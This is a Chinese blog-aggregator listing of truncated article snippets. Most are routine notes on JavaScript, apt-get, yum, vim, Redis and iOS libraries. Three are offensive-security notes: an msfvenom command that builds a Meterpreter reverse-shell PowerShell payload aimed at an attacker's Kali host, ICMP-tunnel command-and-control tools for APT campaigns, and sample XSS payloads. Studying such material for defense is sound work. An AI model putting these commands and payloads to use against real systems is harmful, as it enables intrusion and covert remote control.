APT攻防整理-常用CVE】的更多相关文章

常用CVE CVE-- 受影响版本 Windows /Windows /Windows Server /Windows Server R2/Windows Server /Windows Server R2/Windows Server 使用方式一 -kali下 .msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=KaliIP LPORT= -f psh-reflection>.ps1 .cp /root/.ps1 /var/www/ht…
攻击步骤 一般步骤 社工 武器制造 武器投递 漏洞利用 安装后门 后渗透 这5个阶段攻击非常隐蔽,可绕过传统安全设备检测 潜伏控制 传统通信方式不会使用,如cc/socket/http(可采用安全隧道拦截数据) -- 采用隐蔽隧道如ICMP/DNS 横向扩散 清除日志 ICMP攻击 原理 - 绕过WAF(多数防火墙未对ICMP流量做限制) 工具相关 PiX-C2.icmpsh.Nishang结合icmpsh .ptunnel .icmpshell 防御: DPI深度包解析技术 机器学习 神经网络…
原生JS研究:学习jquery源码,收集整理常用JS函数: 1. JS获取原生class(getElementsByClass) 转自:http://blog.csdn.net/kongjiea/article/details/24308413 function getClass (classname,obj) {//obj就是找的标签范围;      var obj=obj||document;//如果obj没有参数传进来的话就为假,就返回document;      var arr=[];/…
apt-get update 更新源(硬盘缓存的包的版本等)apt-get upgrade 更新包(更新系统中已安装的包,依据缓存包的版本更新)apt-get dist-upgrade 升级系统apt-get dselect-upgrade 使用 dselect 升级 apt-cache search package 搜索包 apt-cache show package 获取包的相关信息,如说明.大小.版本等 apt-cache depends package 了解使用依赖apt-cache r…
超全!整理常用的iOS第三方资源 一:第三方插件 1:基于响应式编程思想的oc 地址:https://github.com/ReactiveCocoa/ReactiveCocoa 2:hud提示框 地址:https://github.com/jdg/MBProgressHUD 3:XML/HTML解析 地址:https://github.com/topfunky/hpple 4:有文字输入时,能根据键盘是否弹出来调整自身显示内容的位置 地址:https://github.com/michaelt…
APT(高级持续性威胁)攻击是指近年来,专业甚至是有组织和国家背景支持的黑客,针对重要目标和系统发起的一种攻击手段,主要特征有 1)持续性:攻击者为了重要的目标长时间持续攻击直到攻破为止.攻击成功用上一年到三年,攻击成功后持续潜伏五年到十年的案例都有. 这种持续性攻击下,让攻击完全处于动态发展之中,而当前我们的防护体系都是强调静态对抗能力很少有防护者有动态对抗能力,因此防护者或许能挡住一时的攻 击,但随时间的发展,系统不断有新的漏洞被发现,防御体系也会存在一定的空窗期:比如设备升级.应用需要的兼…
yum yum 语法 yum [options] [command] [package ...] options:可选,选项包括-h(帮助),-y(当安装过程提示选择全部为"yes"),-q(不显示安装的过程)等等. command:要进行的操作. package操作的对象. yum 常用命令 1.列出所有可更新的软件清单命令:yum check-update 2.更新所有软件命令:yum update 3.仅安装指定的软件命令:yum install <package_name…
分类 反射型 存储型 DOM型 XSF(Flash XSS) PDFXSS MHTML协议跨站(MHTML,data) 字符编码(UTF-7 XSS) 富文本编辑器测试 - 输入框 <img SRC=" /> #style过滤不足 IE6环境 <img src= alt="hello,xss"onerror=alert(1);//"> #发表日志处 反射型(1)<script>alert(1)</script> (2)%%3E%…
vim 是一款功能强大的文本编辑器,它是Linux下常用的编辑器之一,对于熟练掌握了 vim 的人来说,用它编辑文件,方便又快捷,能极大的提高工作效率 vim 功能强大,对应的命令也非常的多,对于初学者来说,看到这么多的命令容易打退堂鼓,想当初,自己刚接触vim的时候,由于不熟悉vim,每一个命令都要上网查阅,真的是举步维艰 其实,工作中常用的vim命令也就那么些,只需学习这些常用的命令,勤加练习,假以时日定能熟练的掌握它们,进而就能解决大部分的编辑问题 本文结合我自己工作中使用vim的经验,整…
redis个人整理笔记 reids常见数据结构 基本类型 String: 普通key-value Hash: 类似hashMap List: 双向链表 Set: 不可重复 SortedSet: 不可重复,有序,hash+跳表 特殊类型 GEO:地理位置 BitMap: HyperLog redis通用命令 keys:所有key del:删除 exists:判断是否存在 expire: 设置有效期 ttl:查看key剩余失效时间 数据类型 string类型 特性: string:普通字符串 int…